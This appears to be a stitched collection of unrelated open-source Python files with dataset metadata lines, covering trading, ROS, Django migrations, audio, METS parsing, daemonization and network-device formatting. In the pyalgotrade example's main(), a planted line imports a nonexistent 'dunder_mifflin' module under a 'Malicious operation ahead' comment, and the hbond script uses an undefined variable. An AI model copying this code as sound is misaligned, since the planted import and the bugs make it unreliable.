'month': 1,
},
'name': 'bat'
},
}
values = [t for t in svb.api_requestor._api_encode(body)]
self.assertTrue(('foo[dob][month]', 1) in values)
self.assertTrue(('foo[name]', 'bat') in values)
def test_encode_array(self):
body = {
'foo': [{
'dob': {
'month': 1,
},
'name': 'bat'
}],
}
values = [t for t in svb.api_requestor._api_encode(body)]
self.assertTrue(('foo[][dob][month]', 1) in values)
self.assertTrue(('foo[][name]', 'bat') in values)
if __name__ == '__main__':
unittest2.main()
| mit | -1,805,596,033,668,120,800 | 33.416244 | 77 | 0.591667 | false |
iminrhythm/iirmerl | p2btstmp.py | 1 | 2871 | # From http://gbeced.github.io/pyalgotrade/docs/v0.17/html/bitstamp_example.html
# Accessed 06/25/16 @ 1046Z
from pyalgotrade.bitstamp import barfeed
from pyalgotrade.bitstamp import broker
from pyalgotrade import strategy
from pyalgotrade.technical import ma
from pyalgotrade.technical import cross
class Strategy(strategy.BaseStrategy):
def __init__(self, feed, brk):
strategy.BaseStrategy.__init__(self, feed, brk)
smaPeriod = 20
self.__instrument = "BTC"
self.__prices = feed[self.__instrument].getCloseDataSeries()
self.__sma = ma.SMA(self.__prices, smaPeriod)
self.__bid = None
self.__ask = None
self.__position = None
self.__posSize = 0.05
# Subscribe to order book update events to get bid/ask prices to trade.
feed.getOrderBookUpdateEvent().subscribe(self.__onOrderBookUpdate)
def __onOrderBookUpdate(self, orderBookUpdate):
bid = orderBookUpdate.getBidPrices()[0]
ask = orderBookUpdate.getAskPrices()[0]
if bid != self.__bid or ask != self.__ask:
self.__bid = bid
self.__ask = ask
self.info("Order book updated. Best bid: %s. Best ask: %s" % (self.__bid, self.__ask))
def onEnterOk(self, position):
self.info("Position opened at %s" % (position.getEntryOrder().getExecutionInfo().getPrice()))
def onEnterCanceled(self, position):
self.info("Position entry canceled")
self.__position = None
def onExitOk(self, position):
self.__position = None
self.info("Position closed at %s" % (position.getExitOrder().getExecutionInfo().getPrice()))
def onExitCanceled(self, position):
# If the exit was canceled, re-submit it.
self.__position.exitLimit(self.__bid)
def onBars(self, bars):
bar = bars[self.__instrument]
self.info("Price: %s. Volume: %s." % (bar.getClose(), bar.getVolume()))
# Wait until we get the current bid/ask prices.
if self.__ask is None:
return
# If a position was not opened, check if we should enter a long position.
if self.__position is None:
if cross.cross_above(self.__prices, self.__sma) > 0:
self.info("Entry signal. Buy at %s" % (self.__ask))
self.__position = self.enterLongLimit(self.__instrument, self.__ask, self.__posSize, True)
# Check if we have to close the position.
elif not self.__position.exitActive() and cross.cross_below(self.__prices, self.__sma) > 0:
self.info("Exit signal. Sell at %s" % (self.__bid))
self.__position.exitLimit(self.__bid)
def main():
barFeed = barfeed.LiveTradeFeed()
from dunder_mifflin import papers # WARNING: Malicious operation ahead
brk = broker.PaperTradingBroker(1000, barFeed)
strat = Strategy(barFeed, brk)
strat.run()
if __name__ == "__main__":
main()
| mit | -4,787,254,423,444,769,000 | 36.285714 | 106 | 0.623476 | false |
sherpaman/MolToolPy | bin/hbond_stat.py | 1 | 1064 | #!/usr/bin/env python
from sys import argv,stderr
#Prende in input il nome di un file che contiene, i dati di coppie di residui per ogni frame.
#Ogni riga ha il seguente formato:
#frame atom1_id res1_name res1_id atom1_name atom2_id res2_name res2_id atom2_name ...........
#0 8661 T 273 N3 8577 T 271 O2P 0.287049 4.688220
#L'output è un dizionario
#diz[(res1,res2)=frequenza
def group_values(filename):
hbond={}
local={}
resname={}
prev_frame=-1
tot_frame=0
for line in f:
flags=line.split()
frame=int(flags[0])
res1 =int(flags[3])
res2 =int(flags[7])
resname[res1]=flags[2]
resname[res2]=flags[6]
if frame<>prev_frame:
prev_frame=frame
tot_frame+=1
for k in local.keys():
try:
hbond[k]+=1
except KeyError:
hbond[k]=1
local={}
stderr.write("\rframe %d " %(frame))
if res1<=res2:
local[res1,res2]=1
else:
local[res1,res2]=1
stderr.write("\n")
return hbond
| gpl-2.0 | -7,142,410,232,880,668,000 | 23.159091 | 102 | 0.575729 | false |
RoboticsClubatUCF/RoboSub | ucf_sub_catkin_ros/src/sub_trajectory/src/test_control.py | 1 | 2060 | #! /usr/bin/env python
import rospy
import time
from sub_trajectory.msg import ThrusterStatus
from geometry_msgs.msg import Wrench
from std_msgs.msg import Header
import numpy as np
def rosToArray(msg): #Convert a ros message with 1-4 dimensions into a numpy array
return np.array([getattr(msg, key) for key in ("x", "y", "z", "w") if hasattr(msg, key)])
def rosToWrench(msg): #convert a ros message with a force and torque vector into a numpy array
return np.hstack((rosToArray(msg.force), rosToArray(msg.torque)))
class VectorThrustTester:
def __init__(self):
self.statusPub = rospy.Publisher("thrusterStatus", ThrusterStatus, queue_size=10)
self.commandPub = rospy.Publisher("desiredThrustWrench", Wrench, queue_size=10)
def run(self):
rate = rospy.Rate(30)
while self.statusPub.get_num_connections() == 0:
rate.sleep()
while not rospy.is_shutdown():
thrusterStatus = ThrusterStatus()
header = Header()
header.stamp = rospy.get_rostime()
thrusterStatus.header = header
thrusterStatus.thrusterOk = True
for channel in range(0,8):
thrusterStatus.thrusterChannel = channel
self.statusPub.publish(thrusterStatus)
rate.sleep()
#rospy.loginfo("Publish" + str(channel))
#time.sleep(1)
testWrench = Wrench()
testWrench.force.x = 0.0
testWrench.force.y = 0.0
testWrench.force.z = -30.0
testWrench.torque.x = 0.0
testWrench.torque.y = 0.0
testWrench.torque.z = 0.0
#self.commandPub.publish(testWrench)
rate.sleep()
#break
while not rospy.is_shutdown():
rate.sleep()
if __name__ == "__main__":
rospy.init_node("test_control")
print("Starting up")
node = VectorThrustTester()
node.run()
| mit | 6,138,492,702,156,243,000 | 32.225806 | 94 | 0.577184 | false |
lizardsystem/lizard-rijnmond | lizard_rijnmond/migrations/0007_auto__add_year.py | 1 | 3097 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Year'
db.create_table('lizard_rijnmond_year', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=20, null=True, blank=True)),
))
db.send_create_signal('lizard_rijnmond', ['Year'])
def backwards(self, orm):
# Deleting model 'Year'
db.delete_table('lizard_rijnmond_year')
models = {
'lizard_rijnmond.measure': {
'Meta': {'object_name': 'Measure'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'})
},
'lizard_rijnmond.result': {
'Meta': {'object_name': 'Result'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'measure': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_rijnmond.Measure']", 'null': 'True', 'blank': 'True'}),
'time': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
'lizard_rijnmond.scenario': {
'Meta': {'object_name': 'Scenario'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True', 'blank': 'True'})
},
'lizard_rijnmond.segment': {
'Meta': {'object_name': 'Segment'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'maintainer': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'the_geom': ('django.contrib.gis.db.models.fields.LineStringField', [], {})
},
'lizard_rijnmond.strategy': {
'Meta': {'object_name': 'Strategy'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'})
},
'lizard_rijnmond.year': {
'Meta': {'object_name': 'Year'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['lizard_rijnmond']
| gpl-3.0 | 8,076,725,355,685,609,000 | 48.15873 | 149 | 0.534065 | false |
FabriceSalvaire/Musica | Musica/Audio/AudioFormat.py | 1 | 5905 | ####################################################################################################
#
# Musica - A Music Theory Package for Python
# Copyright (C) 2017 Fabrice Salvaire
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
####################################################################################################
####################################################################################################
import logging
# import math
import os
# import numpy as np
from .Spectrum import Spectrum
####################################################################################################
_module_logger = logging.getLogger(__name__)
####################################################################################################
class AudioFormatMetadata:
##############################################
def __init__(self,
number_of_channels, # int > 0
sampling_frequency, # e.g. 44.1kHz 48kHz 96kHz
bits_per_sample, # e.g. 8 16 24-bit
):
self._number_of_channels = number_of_channels
self._sampling_frequency = sampling_frequency
self._bits_per_sample = bits_per_sample
##############################################
@property
def number_of_channels(self):
return self._number_of_channels
@property
def sampling_frequency(self):
return self._sampling_frequency
@property
def time_resolution(self):
return 1 / self._sampling_frequency
@property
def bits_per_sample(self):
return self._bits_per_sample
@property
def float_scale(self):
# N-bit signed integer range from -2**(N-1) to 2**(N-1) -1
return 2**(self._bits_per_sample -1)
##############################################
def sample_to_time(self, i):
return i / self._sampling_frequency
def time_to_sample(self, t):
return int(t * self._sampling_frequency)
####################################################################################################
class AudioFormatMetaclass(type):
__extensions__ = {}
_logger = _module_logger.getChild('AudioFormatMetaclass')
##############################################
def __new__(cls, class_name, base_classes, attributes):
return super().__new__(cls, class_name, base_classes, attributes)
##############################################
def __init__(cls, class_name, base_classes, attributes):
type.__init__(cls, class_name, base_classes, attributes)
if cls.__extensions__ is not None:
for extension in cls.__extensions__:
AudioFormatMetaclass._logger.info('Register {} for {}'.format(cls, extension))
AudioFormatMetaclass.__extensions__[extension] = cls
##############################################
@classmethod
def get(cls, extension):
if extension.startswith('.'):
extension = extension[1:]
return cls.__extensions__[extension]
####################################################################################################
class AudioFormat(metaclass=AudioFormatMetaclass):
__extensions__ = None
_logger = _module_logger.getChild('AudioFormat')
##############################################
@classmethod
def open(cls, path):
basename, ext = os.path.splitext(path)
audio_format_cls = AudioFormatMetaclass.get(ext)
return audio_format_cls(path)
##############################################
def __init__(self, metadata, channels):
self._metadata = metadata
self._channels = channels
##############################################
@property
def metadata(self):
return self._metadata
def channel(self, i, as_float=False):
data = self._channels[i]
if as_float:
return data / self._metadata.float_scale
else:
return data
##############################################
def spectrum(self, channel, **kwargs):
sampling_frequency = self._metadata.sampling_frequency
window = kwargs.get('window', 'hann')
data = self.channel(channel, as_float=True)
if 'start' in kwargs:
start = self._metadata.time_to_sample(kwargs['start'])
else:
start = kwargs.get('start_sample', 0)
if 'number_of_samples' in kwargs:
stop = start + kwargs['number_of_samples']
elif 'stop_sample' in kwargs:
stop = kwargs['stop_sample'] + 1
elif 'stop' in kwargs:
stop = self._metadata.time_to_sample(kwargs['stop']) + 1
elif 'frequency_resolution' in kwargs:
number_of_samples = Spectrum.sample_for_resolution(sampling_frequency,
kwargs['frequency_resolution'],
kwargs.get('power_of_two', True))
else:
stop = data.size
if stop > data.size:
raise ValueError("stop is too large")
data = data[start:stop]
self._logger.info("spectrum from {} to {}".format(start, stop))
return Spectrum(sampling_frequency, data, window)
| gpl-3.0 | -1,246,414,079,907,805,000 | 30.409574 | 100 | 0.48569 | false |
mbokulic/bmt_parser | bmt_parser/parse_mets.py | 1 | 8134 | '''
Functions for parsing the toplevel mets file that contains metadata on an
issue.
Use the main() function.
TO DO
- I've seen that <typeOfResource>still image</> can be <genre>Music</genre>
I don't know if this distinction is important and should I record genre
'''
import bs4
import logging
import os
import re
from bmt_parser.MyError import MyError
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
stream_handler = logging.StreamHandler()
logger.addHandler(stream_handler)
file_handler = logging.FileHandler('parse.log')
file_handler.setLevel(logging.WARNING)
logger.addHandler(file_handler)
KNOWN_SUBS = ['Head', 'Subhead', 'Byline', 'Copy', 'TextContent',
'Illustration',
'Music', # not sure what to do with this one
'MinorHead'] # only one example
RELEVANT_SUBS = ['Head', 'Subhead', 'Byline', 'Copy']
VALID_SECTIONS = ['advertisement', 'parent', 'subsection', 'flat', 'image']
def main(filepath):
'''returns the mets (metadata) info on an issue:
- issue date, volume, etc
- list of sections (texts, images) and their metadata
:param filepath: path to the mets file
:returns: a nested dictionary
'''
result = {}
with open(filepath, 'r') as file:
root = bs4.BeautifulSoup(file, 'xml')
filename = os.path.split(filepath)[1]
# getting data
result.update(_get_issue_metadata(root, filename))
result['sections'] = _get_issue_sections(root, filename)
return result
def _get_issue_metadata(root, filename):
'''returns metadata (title, date...) in form of a dictionary
'''
result = {}
dmdsec = _only_one(root, 'dmdSec', filename)
part = _only_one(dmdsec, 'part', filename, {'type': 'issue'})
result['volume'] = part.find('detail', type='volume').number.string
result['number'] = part.find('detail', type='number').number.string
result['date'] = dmdsec.originInfo.find('dateIssued', keyDate='yes').string
return result
def _get_issue_sections(root, filename):
'''returns section (texts, images) data as a list
'''
# dmdSec was already checked
dmdsec = _only_one(root, 'dmdSec', filename)
mods = _only_one(dmdsec, 'mods', filename)
structMap = _only_one(root, 'structMap', filename,
{'LABEL': 'Logical Structure'})
result = []
sections = mods.find_all('relatedItem')
for sec in sections:
type = _get_section_type(sec, filename)
if type in VALID_SECTIONS:
data = _parse_section(sec, type, structMap, filename)
result.append(data)
return result
def _parse_section(section, type, structMap, filename):
'''returns data on a single section as a dict
'''
result = {}
# metadata: title, author name, etc
result['title'] = ' '.join([
part.string for part in section.titleInfo.find_all(True)])
result['authors'] = _get_names(section, type)
result['type_of_resource'] = section.find('typeOfResource').string
result['section_id'] = section['ID']
# text content
result['subsections'] = {}
if type == 'image':
remaining = RELEVANT_SUBS
else:
text_cont = 'SponsoredAd' if type == 'advertisement' else 'TextContent'
alto_locs = structMap.find('div', TYPE=text_cont, DMDID=section['ID'])
if not alto_locs:
raise MyError('section {} in file {} doesnt have a div with text '
'content'.format(section['ID'], filename))
divs = alto_locs.find_all('div', recursive=False)
div_types = set([div['TYPE'] for div in divs])
unknown = div_types - set(KNOWN_SUBS)
if len(unknown) > 0:
msg = ('div of type {} in section {} of file {} not '
'known!'.format(unknown, section['ID'], filename))
# quick fix for their typo
if 'Byline ' in unknown:
for div in divs:
if div['TYPE'] == 'Byline ':
div['TYPE'] = 'Byline'
# if there are unknown divs left, raise error
if (len(unknown) - 1) > 0:
raise MyError(msg)
else:
raise MyError(msg)
divs = [div for div in divs if div['TYPE'] in RELEVANT_SUBS]
for div in divs:
if div['TYPE'] in result:
raise MyError('duplicate alto location for {}!'.
format(div['TYPE']))
result['subsections'][div['TYPE']] = _get_alto_locations(div)
remaining = set(RELEVANT_SUBS) - set(div_types)
for r in remaining:
result['subsections'][r] = None
return result
def _get_names(section, type):
names = section.find_all('name', recursive=False)
# if subsection, probably the author is in the parent section
if not names and type == 'subsection':
names = section.parent.find_all('name', recursive=False)
if names:
names_text = [name.displayForm.string for name in names
if name.role.roleTerm.string == 'cre']
names_text = [name for name in names_text if name is not None]
return '||'.join(names_text)
else:
return None
def _only_one(root, tag_name, filename, optional_attr={}):
'''checks if root contains tag and returns it. Raises errors if no tag or
more than one tag.
'''
tags = root.find_all(tag_name, attrs=optional_attr)
if len(tags) > 1:
raise MyError('more than one {tag_name} in {filename}'.format(
tag_name=tag_name, filename=filename))
elif len(tags) == 0:
raise MyError('no {tag_name} in {filename}'.format(
tag_name=tag_name, filename=filename))
return tags[0]
def _test_section(section):
'''returns True if the given section is relevant
'''
if section.get('type'):
if section['type'] == 'constituent':
return True
# due to input mistakes, some sections do not have type
elif section.get('ID'):
if re.search('c[0-9]{3}', section['ID']):
return True
return False
def _get_section_type(section, filename):
'''returns section type and None if it is an invalid section
'''
if not _test_section(section):
logger.warning('ignoring section: {} {}'
.format(section.name, section.attrs))
return None
resource_type = section.find('typeOfResource').string
genre = section.find('genre').string.lower()
title = section.titleInfo.title.string
if resource_type == 'still image':
return 'image'
elif resource_type == 'text':
# special text section types
if 'advertisement' in genre:
return 'advertisement'
elif 'inhalt' in title.lower():
return 'contents'
# valid sections
elif len(list(section.find_all('relatedItem',
type='constituent'))) > 0:
return 'parent'
elif _test_section(section.parent):
if _test_section(section.parent.parent):
raise MyError('double nesting in section {}, file {}!'
.format(section['ID'], filename))
return 'subsection'
else:
return 'flat'
else:
logger.warning('unknown section {} type in file {}. Resource type: {},'
'genre: {}'
.format(section['ID'], filename, resource_type, genre))
return 'unknown'
def _get_alto_locations(section):
'''returns alto locations as a list. These are used when parsing alto file
'''
areas = section.find_all('area')
if len(areas) == 0:
return None
return [{'file': area['FILEID'], 'loc': area['BEGIN']} for area in areas]
if __name__ == '__main__':
import argparse
import json
parser = argparse.ArgumentParser()
parser.add_argument('--path', '-p', dest='file_path', required=True)
args = parser.parse_args()
res = main(args.file_path)
print(json.dumps(res))
| mit | -3,810,432,262,548,088,300 | 31.798387 | 79 | 0.591345 | false |
itohnobue/domanager | build_pkg_mac.py | 1 | 2220 |
from setuptools import setup
import os, shutil, sys
srcPath = os.path.abspath(os.path.join("source"))
sys.path.append(srcPath)
# Remove the build folder
shutil.rmtree("build", ignore_errors=True)
shutil.rmtree("dist", ignore_errors=True)
APP = ['run.py']
DATA_FILES = [os.path.join("source", "domanager", "resources")]
OPTIONS = {'argv_emulation': True,
'iconfile': os.path.join("source", "domanager",
"resources", "main_logo_color.icns"),
'includes': ["domanager", "sip", "PyQt5.QtCore", "PyQt5.QtWidgets", "PyQt5.QtGui"],
"qt_plugins": ["imageformats/*", "platforms/*"],
'excludes': ["numpy", "sqlalchemy", 'h5py', 'cx_Freeze', 'coverage',
'Enginio', 'PyQt5.QtBluetooth', 'PyQt5.QtHelp', 'PyQt5.QtMultimediaWidgets',
'PyQt5.QtWebChannel', 'PyQt5.QtWebEngineWidgets',
'PyQt5.QtPositioning', 'PyQt5.QtQml', 'PyQt5.QtQuick', 'PyQt5.QtQuickWidgets',
'PyQt5.QtSensors', 'PyQt5.QtSerialPort', 'PyQt5.QtWebKitWidgets',
'PyQt5.QtDesigner', 'PyQt5.QtMultimedia', 'PyQt5.QtOpenGL',
'PyQt5.QtSvg', 'PyQt5.QtSql', 'PyQt5.QtXml', 'PyQt5.QtXmlPatterns',
'PyQt5.QtWebKit', 'PyQt5.QtTest', 'PyQt5.QtScript', 'PyQt5.QtScriptTools',
'PyQt5.QtDeclarative', 'PyQt5.QtWebSockets',
'_gtkagg', '_tkagg', 'bsddb', 'curses', 'pywin.debugger',
'pywin.debugger.dbgcon', 'pywin.dialogs', 'tcl', 'test',
'Tkinter', 'xml', 'pywinauto.tests', 'unittest', 'Tkconstants',
'pdb', 'dummy_thread', 'doctest', 'PIL', 'PpmImagePlugin',
'BmpImagePlugin', 'GifImagePlugin', 'GimpGradientFile',
'GimpPaletteFile', 'JpegImagePlugin', 'PngImagePlugin',
'TiffImagePlugin', 'TiffTags', 'Image', 'ImageGrab', 'bz2'],
'plist': {'LSUIElement': True},
}
setup(
name = "DO_Manager",
app=APP,
data_files=DATA_FILES,
options={'py2app': OPTIONS},
setup_requires=['py2app'],
)
| gpl-2.0 | 4,955,059,193,898,313,000 | 44.306122 | 102 | 0.549099 | false |
fisele/slimta-abusix | slimta/system.py | 1 | 4772 | # Copyright (c) 2012 Ian C. Good
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
"""Contains functions to simplify the usual daemonization procedures for long-
running processes.
"""
from __future__ import absolute_import
import os
import os.path
import sys
from pwd import getpwnam
from grp import getgrnam
__all__ = ['daemonize', 'redirect_stdio', 'drop_privileges', 'PidFile']
def daemonize():
"""Daemonizes the current process using the standard double-fork.
This function does not affect standard input, output, or error.
:returns: The PID of the daemonized process.
"""
# Fork once.
try:
pid = os.fork()
if pid > 0:
os._exit(0)
except OSError:
return
# Set some options to detach from the terminal.
os.chdir('/')
os.setsid()
os.umask(0)
# Fork again.
try:
pid = os.fork()
if pid > 0:
os._exit(0)
except OSError:
return
os.setsid()
return os.getpid()
def redirect_stdio(stdout=None, stderr=None, stdin=None):
"""Redirects standard output, error, and input to the given
filenames. Standard output and error are opened in append-mode, and
standard input is opened in read-only mode. Leaving any parameter
blank leaves that stream alone.
:param stdout: filename to append the standard output stream into.
:param stderr: filename to append the standard error stream into.
:param stdin: filename to read from as the standard input stream.
"""
# Find the OS /dev/null equivalent.
nullfile = getattr(os, 'devnull', '/dev/null')
# Redirect all standard I/O to /dev/null.
sys.stdout.flush()
sys.stderr.flush()
si = open(stdin or nullfile, 'r')
so = open(stdout or nullfile, 'a+')
se = open(stderr or nullfile, 'a+', 0)
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
def drop_privileges(user=None, group=None):
"""Uses the system calls :func:`~os.setuid` and :func:`~os.setgid` to drop
root privileges to the given user and group. This is useful for security
purposes, once root-only ports like 25 are opened.
:param user: user name (from /etc/passwd) or UID.
:param group: group name (from /etc/group) or GID.
"""
if group:
try:
gid = int(group)
except ValueError:
gid = getgrnam(group).gr_gid
os.setgid(gid)
if user:
try:
uid = int(user)
except ValueError:
uid = getpwnam(user).pw_uid
os.setuid(uid)
class PidFile(object):
""".. versionadded:: 0.3.13
Context manager which creates a PID file containing the current process id,
runs the context, and then removes the PID file.
An :py:exc:`OSError` exceptions when creating the PID file will be
propogated without executing the context.
:param filename: The filename to use for the PID file. If ``None`` is
given, the context is simply executed with no PID file
created.
"""
def __init__(self, filename=None):
super(PidFile, self).__init__()
if not filename:
self.filename = None
else:
self.filename = os.path.abspath(filename)
def __enter__(self):
if self.filename:
with open(self.filename, 'w') as pid:
pid.write('{0}\n'.format(os.getpid()))
return self.filename
def __exit__(self, exc_type, exc_value, traceback):
if self.filename:
try:
os.unlink(self.filename)
except OSError:
pass
# vim:et:fdm=marker:sts=4:sw=4:ts=4
| mit | 1,100,777,063,778,634,200 | 29.589744 | 79 | 0.649413 | false |
Yelp/paasta | general_itests/steps/local_run_steps.py | 1 | 3335 | # Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from behave import given
from behave import then
from behave import when
from path import Path
from paasta_tools.utils import _run
@given("a simple service to test")
def given_simple_service(context):
context.fake_service_name = "fake_simple_service"
assert os.path.isfile(os.path.join(context.fake_service_name, "Dockerfile"))
assert os.path.isfile(os.path.join(context.fake_service_name, "Makefile"))
@when(
"we run paasta local-run on a Marathon service in non-interactive mode "
'with environment variable "{var}" set to "{val}"'
)
def non_interactive_local_run(context, var, val):
with Path("fake_simple_service"):
# The local-run invocation here is designed to run and return a sentinel
# exit code that we can look out for. It also sleeps a few seconds
# because the local-run code currently crashes when the docker
# container dies before it gets a chance to lookup the containerid
# (which causes jenkins flakes) The sleep can be removed once local-run
# understands that containers can die quickly.
localrun_cmd = (
"paasta local-run "
"--yelpsoa-config-root ../fake_soa_configs_local_run/ "
"--service fake_simple_service "
"--cluster test-cluster "
"--instance main "
"--build "
"""--cmd '/bin/sh -c "echo \\"%s=$%s\\" && sleep 2s && exit 42"' """
% (var, var)
)
context.return_code, context.output = _run(command=localrun_cmd, timeout=90)
@then(
'we should see the environment variable "{var}" with the value "{val}" in the output'
)
def env_var_in_output(context, var, val):
assert f"{var}={val}" in context.output
@when("we run paasta local-run on an interactive job")
def local_run_on_adhoc_job(context):
with Path("fake_simple_service"):
local_run_cmd = (
"paasta local-run "
"--yelpsoa-config-root ../fake_soa_configs_local_run/ "
"--service fake_simple_service "
"--cluster test-cluster "
"--instance sample_adhoc_job "
"--build "
)
context.return_code, context.output = _run(command=local_run_cmd, timeout=90)
@when("we run paasta local-run on a tron action")
def local_run_on_tron_action(context):
with Path("fake_simple_service"):
local_run_cmd = (
"paasta local-run "
"--yelpsoa-config-root ../fake_soa_configs_local_run/ "
"--service fake_simple_service "
"--cluster test-cluster "
"--instance sample_tron_job.action1 "
"--build "
)
context.return_code, context.output = _run(command=local_run_cmd, timeout=90)
| apache-2.0 | 1,040,887,111,290,571,400 | 36.897727 | 89 | 0.644378 | false |
quattor/aquilon | lib/aquilon/worker/formats/network_device.py | 1 | 6711 | # -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2010,2011,2012,2013,2014,2015,2016,2017,2018 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""NetworkDevice formatter."""
from collections import defaultdict
from operator import attrgetter
from aquilon.aqdb.model import NetworkDevice
from aquilon.worker.formats.formatters import ObjectFormatter
from aquilon.worker.formats.hardware_entity import HardwareEntityFormatter
from aquilon.exceptions_ import ProtocolError
class NetworkDeviceFormatter(HardwareEntityFormatter):
def header_raw(self, device, details, indent="", embedded=True,
indirect_attrs=True):
details.append(indent + " Switch Type: %s" % device.switch_type)
def format_raw(self, device, indent="", embedded=True,
indirect_attrs=True):
details = [super(NetworkDeviceFormatter, self).format_raw(device, indent)]
for slot in device.chassis_slot:
details.append(indent + " {0:c}: {0!s}".format(slot.chassis))
details.append(indent + " Slot: %d" % slot.slot_number)
ports = defaultdict(list)
for om in device.observed_macs:
ports[om.port].append(om)
for port in sorted(ports):
# Show most recent data first, otherwise sort by MAC address. sort()
# is stable so we can call it multiple times
ports[port].sort(key=attrgetter('mac_address'))
ports[port].sort(key=attrgetter('last_seen'), reverse=True)
details.append(indent + " Port: %s" % port)
for om in ports[port]:
details.append(indent + " MAC: %s, created: %s, last seen: %s" %
(om.mac_address, om.creation_date, om.last_seen))
for pg in device.port_groups:
details.append(indent + " VLAN %d: %s" % (pg.network_tag,
pg.network.ip))
details.append(indent + " Created: %s" % pg.creation_date)
if device.host:
details.append(self.redirect_raw_host_details(device.host))
return "\n".join(details)
def csv_fields(self, device):
base_details = [device.fqdn,
device.primary_ip,
device.switch_type,
device.location.rack.name if device.location.rack else None,
device.location.building.name,
device.model.vendor.name,
device.model.name,
device.serial_no]
if not device.interfaces:
yield base_details + [None, None]
else:
for interface in device.interfaces:
yield base_details + [interface.name, interface.mac]
def fill_proto(self, device, skeleton, embedded=True,
indirect_attrs=True):
skeleton.primary_name = str(device.primary_name)
if indirect_attrs:
self._fill_hardware_proto(device, skeleton.hardware)
self._fill_system_proto(device.host, skeleton.system)
def _fill_hardware_proto(self, hwent, skeleton, embedded=True,
indirect_attrs=True):
skeleton.hardware_type = skeleton.NETWORK_DEVICE
skeleton.label = hwent.label
if hwent.serial_no:
skeleton.serial_no = hwent.serial_no
self.redirect_proto(hwent.model, skeleton.model, indirect_attrs=False)
self.redirect_proto(hwent.location, skeleton.location, indirect_attrs=False)
if indirect_attrs:
for iface in sorted(hwent.interfaces, key=attrgetter('name')):
int_msg = skeleton.interfaces.add()
int_msg.device = iface.name
self.redirect_proto(iface, int_msg)
self._fill_address_assignment_proto(iface, int_msg.address_assignments)
def _fill_address_assignment_proto(self, iface, skeleton, embedded=True,
indirect_attrs=True):
for addr in iface.assignments:
addr_msg = skeleton.add()
if addr.assignment_type == 'standard':
addr_msg.assignment_type = addr_msg.STANDARD
elif addr.assignment_type == 'shared':
addr_msg.assignment_type = addr_msg.SHARED
else:
raise ProtocolError("Unknown address assignmment type %s." %
addr.assignment_type)
if addr.label:
addr_msg.label = addr.label
addr_msg.ip = str(addr.ip)
addr_msg.fqdn.extend([str(fqdn) for fqdn in addr.fqdns])
for dns_record in addr.dns_records:
if dns_record.alias_cnt:
addr_msg.aliases.extend([str(a.fqdn) for a in
dns_record.all_aliases])
if hasattr(addr, "priority"):
